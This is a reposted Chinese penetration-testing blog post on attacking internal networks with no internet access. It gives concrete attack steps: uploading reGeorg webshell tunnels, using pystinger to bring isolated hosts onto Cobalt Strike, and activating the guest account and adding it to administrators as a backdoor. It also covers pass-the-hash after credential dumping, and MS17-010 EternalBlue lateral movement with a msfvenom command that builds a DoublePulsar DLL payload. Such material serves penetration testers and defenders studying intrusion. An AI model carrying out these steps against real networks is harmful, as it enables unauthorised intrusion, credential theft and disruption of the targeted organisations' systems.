作者：諾言
轉載自：https://www.freebuf.com/articles/web/247287.html

前言

最近打了幾場**，遇到幾個內網環境都不通外網，整理下用到的幾種不出網內網滲透技巧。

socks隧道搭建

常用工具：reGeorg,Proxifier

用的比較多的一個隧道代理工具

1、上傳對應語言的腳本到目標服務器的網站目錄下

2、通過瀏覽器訪問上傳的腳本文件，顯示如下表示成功。

3、本地運行reGeorgSocksProxy.py，-p為指定隧道的端口，-u為剛剛上傳的tunnel文件地址。

Python reGeorgSocksProxy.py -p 8888 -u http://x.x.x.x/tunnel.php

5、成功把本機帶入內網。

cs上線

cs逐漸成為內網滲透中使用最多的工具，在目標不通外網的情況下，無法直接與公網的cs服務端建立連接。

pystinger

下載地址：https://github.com/FunnyWolf/pystinger
通過webshell實現內網SOCK4代理，端口映射可以使目標不出網情況下在cs上線。

直接使用cs多主機上線方法。
首先上傳對應語言的腳本到網站目錄下。

將stinger_server.exe上傳到目標服務器
創建stinger_server.vbs文件,示例如下:

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c D:XXXXXstinger_server.exe 0.0.0.0",vbhide

把stinger_client上傳到公網vps，-w指定proxy的url地址運行。

chmod 777 stinger_client
./stinger_client -w http://x.x.x.x/proxy.jsp -l 0.0.0.0 -p 60000

抓取上線的主機密碼。

對內網其它主機進行pth攻擊，選擇剛才建立的監聽器。

目標主機成功上線。

坑點：使用過程中cs會話可能假死掉，需要把stinger_server.exe進程結束掉，然后重新啟動。

在目標內網搭建cs服務端

如果拿下了目標主機的管理員權限，可以激活guest用戶，建立基于http的socks隧道，登錄遠程桌面，在目標內網搭建cs服務端。
缺點：被發現概率上升；需要安裝JAVA環境；基于web的socks隧道速度很慢，心態容易蹦。
首先激活guest用戶

net user guest   /active:yes
net user guest   1q2w3e4r@
net localgroup   administrators  guest   /add

上傳cs4.0到目標服務器。

運行服務端

teamserver.bat x.x.x.x 1q2w3e4r

點擊cs.bat運行客戶端

然后就可以直接在內網操作cs了。

ms17010橫向利用

內網滲透中常用的攻擊手段，隨著補丁和殺軟的普及，能利用的場景越來越少，而且容易造成目標藍屏，影響業務，所以謹慎使用。
之前的利用都是在通外網下情況下利用msf攻擊。
本次在目標不出網的情況下進行利用。

方程式漏洞利用工具

生成對應監聽器的bin文件。

使用msf把cs生成的bin文件轉化為方程式利用工具可以使用的dll文件。

msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o x64.dll

把原來的x64.dll文件替換掉，把工具上傳到目標主機上。
設置targetip為存在漏洞的主機ip，設置系統類型，點擊attack執行利用工具，利用成功返回success。

選擇doublepulsar模塊，配置ip選擇位數，默認加載dll，點擊attack在攻擊主機執行剛剛生成的x64.dll文件。

目標在cs上線成功。

cs永恒之藍利用插件

下載地址：https://github.com/phink-team/Cobaltstrike-MS17-010
cs安裝下載的插件,導入aggressor.cna文件。
使用pystinger多主機模式使內網主機在cs上線，生成對應的內網監聽器test。

內網主機上線后，右鍵使用ms17-010攻擊插件。

ip配置為存在漏洞的主機ip，監聽器選擇test，次數更改為1次，降低藍屏風險。

成功通過ms17-010攻擊其它主機，cs上線成功。

總結

本次列舉了最近實戰用到的幾個小技巧，技術含量不高，希望能幫到大家。